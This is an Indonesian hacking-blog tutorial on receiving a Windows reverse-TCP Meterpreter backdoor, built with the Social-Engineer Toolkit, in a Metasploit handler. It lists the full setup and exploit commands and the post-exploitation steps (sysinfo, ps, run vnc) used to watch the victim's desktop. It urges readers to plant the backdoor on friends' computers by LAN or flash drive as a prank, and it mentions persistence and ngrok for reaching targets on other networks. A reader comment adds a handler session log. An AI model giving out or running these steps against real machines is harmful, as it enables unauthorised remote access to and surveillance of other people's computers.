Menjalankan Backdoor exploit windows dari setoolkit ke metasploit di linux


hello guys ketemu lagi bersama saya Mr.GagalTotal666
sory yaa telat upload nih saya tadi ketiduran -_- seharusnya artikel ini
terupload jam 1 malem eh malah jadi jam 5 pagi -_-
oke langsung saja kali ini saya akan share cara menjalankan backdoor exploit windows
yang tadi nya saya buat di tools setoolkit yang tutorial sebelum nya yaitu
[cara membuat backdoor exploit windows]
oke langsung saja ikuti step by step nya

setelah membuat backdoor dari setoolkit tersebut
kita kirim backdoor kita ke target kalian masing-masing
disini saya memakai pc kaka saya buat ujicoba tanam backdoor
oke langsung saja buka terminal kalian

pertama jalankan service Postgresql, dengan perintah

" $ /etc/init.d/postgresql start "

jika kalian belum sering buka metasploit atau baru pertama kali buka
metasploit saya sarankan kalian buat database msfdb nya , dengan perintah

" $ msfdb init "

dan bagi yang sudah membuat msfdb nya kalian boleh langsung saja ketikan
perintah " postgresql start " dan langsung jalankan metasploit nya

" $ msfconsole "


kalau kalian yang sudah membuat " msfdb init " maka akan muncul seperti
gambar yang di atas, yang ada tulisan nya
" A database appears to be already configured "
bagi yang belum akan ada tulisan " Creating database bla bla bla "
seperti itu karena saya sudah membuat database dari msfdb tersebut

yang kedua setelah metasploit terbuka, kalian ketikan yang perintah di bawah ini

" msf > use exploit/multi/handler "
" msf > set payload windows/meterpreter/reverse_tcp "
" msf > set LHOST 192.168.43.59 " >> ip ini yang pas tadi kita buat backdoor itu 
" msf > set LPORT 443 " >> port nya juga yang dari backdoor kita buat di setoolkit itu 
" msf > exploit " atau juga bisa " msf > run "


kirim backdoor kita ke target kita bisa kalian kirim melalu jaringan Lan, wifi,
dan atau kalian bisa kirim backdoor nya ke pc teman kalian menggunakan flashdisk untuk
iseng buat jahil wkwkwk, tapi ingat loh backdoor yang kita buat dari setoolkit bisa
tanem permanen walaupun isi backdoor kita di hapus di komputer target kita masih bisa
kita remote dan pantau target kita loh, tapi kalau si target mematikan komputer nya kita
tidak bisa ngeremote, sedih wkwkwk ok nanti saya akan share lagi tutorial cara tanem
backdoor permanen nya mendalam
oke di lanjut saja

setelah kita sudah mengirim backdoor kita ke target maka akan di buka target kita,
akan muncul seperti ini


lihat backdoor kita akan nampak di target kalau si target membuka nya
tapi itu tidak akan bertahan lama akan keluar sendiri dalam hitungan 3 detik
dan kita mendapatkan " meterpreter "


dan kita sekarang bisa mengeksekusi nya
ok kita cek dulu apakah ini benar target kita ?
cek dengan perintah

" meterpreter > sysinfo "


hmm seperti nya sudah target saya laptop acer punya kakak saya wkwkwk
untuk masuk system 32 nya kita ketikan perintah

" meterpreter > ps "


hmm mantep sudah wkwkwk
nah kita remote ya masuk ke Desktop nya dan pantau si korban
kita lagi ngapain wkwkwk
oke masukan perintah

" meterpreter > run vnc "


dan terbuka ^_^ lihat si korban lagi belum bergerak masih berada di desktop aja wkwkwk
ane sarankan ya kalau lagi buka ini jangan membuka system lain nya karena kita
sedang meremote Desktop pc dan akan mengakibatkan lagg nya dari kita saat si korban
beraktifitas kalau kita nya membuka browser dan sebagainya yang memakan banyak memory (ram)

oke cukup di sini aja saya kasih tutorial nya nanti kalau nambah
mendalam kalian akan menggunaka ilmu ini sebagai kejahatan

sekian tips dari saya ^_^ semoga bermanfaat ya

NB : DILARANG PLAGIAT GAMBAR ATAU MENCURI GAMBAR DARI POST INI!
NB : DI TUTORIAL INI HANYA DI SATU JARINGAN, UNTUK BEDA JARINGAN ANDA HARUS PORT FORDWARDING DI ROUTE ATAU BISA MENGGUNAKAN NGROK
Previous
Next Post »

1 komentar:

Click here for komentar
Nasir Ismail
admin
July 27, 2018 at 3:55 PM ×

msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.115.149:443
[*] Sending stage (179779 bytes) to 192.168.115.152
[*] - Meterpreter session 93 closed. Reason: Died
[*] Meterpreter session 93 opened (127.0.0.1 -> 127.0.0.1) at 2018-07-27 18:38:16 -0400
[*] Sending stage (179779 bytes) to 192.168.115.152
# terminated with exception (report_on_exception is true):
Traceback (most recent call last):
3: from /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
2: from /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
1: from /usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:347:in `block in monitor_socket'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:357:in `rescue in block in monitor_socket': undefined method `join' for nil:NilClass (NoMethodError)
[*] Meterpreter session 94 opened (192.168.115.149:443 -> 127.0.0.1) at 2018-07-27 18:38:16 -0400
[*] Sending stage (179779 bytes) to 192.168.115.152
[*] Meterpreter session 95 opened (192.168.115.149:443 -> 127.0.0.1) at 2018-07-27 18:38:17 -0400
[*] Sending stage (179779 bytes) to 192.168.115.152
[*] - Meterpreter session 94 closed. Reason: Died
[*] - Meterpreter session 95 closed. Reason: Died
[*] - Meterpreter session 96 closed. Reason: Died
[*] Meterpreter session 96 opened (127.0.0.1 -> 127.0.0.1) at 2018-07-27 18:38:17 -0400
[*] Sending stage (179779 bytes) to 192.168.115.152
[*] Meterpreter session 97 opened (192.168.115.149:443 -> 127.0.0.1) at 2018-07-27 18:38:22 -0400
[*] Sending stage (179779 bytes) to 192.168.115.152
[*] - Meterpreter session 97 closed. Reason: Died

mohon bantuan pertolongan mengapa silap saya ya TQ

Congrats bro Nasir Ismail you got PERTAMAX...! hehehehe...
Reply
avatar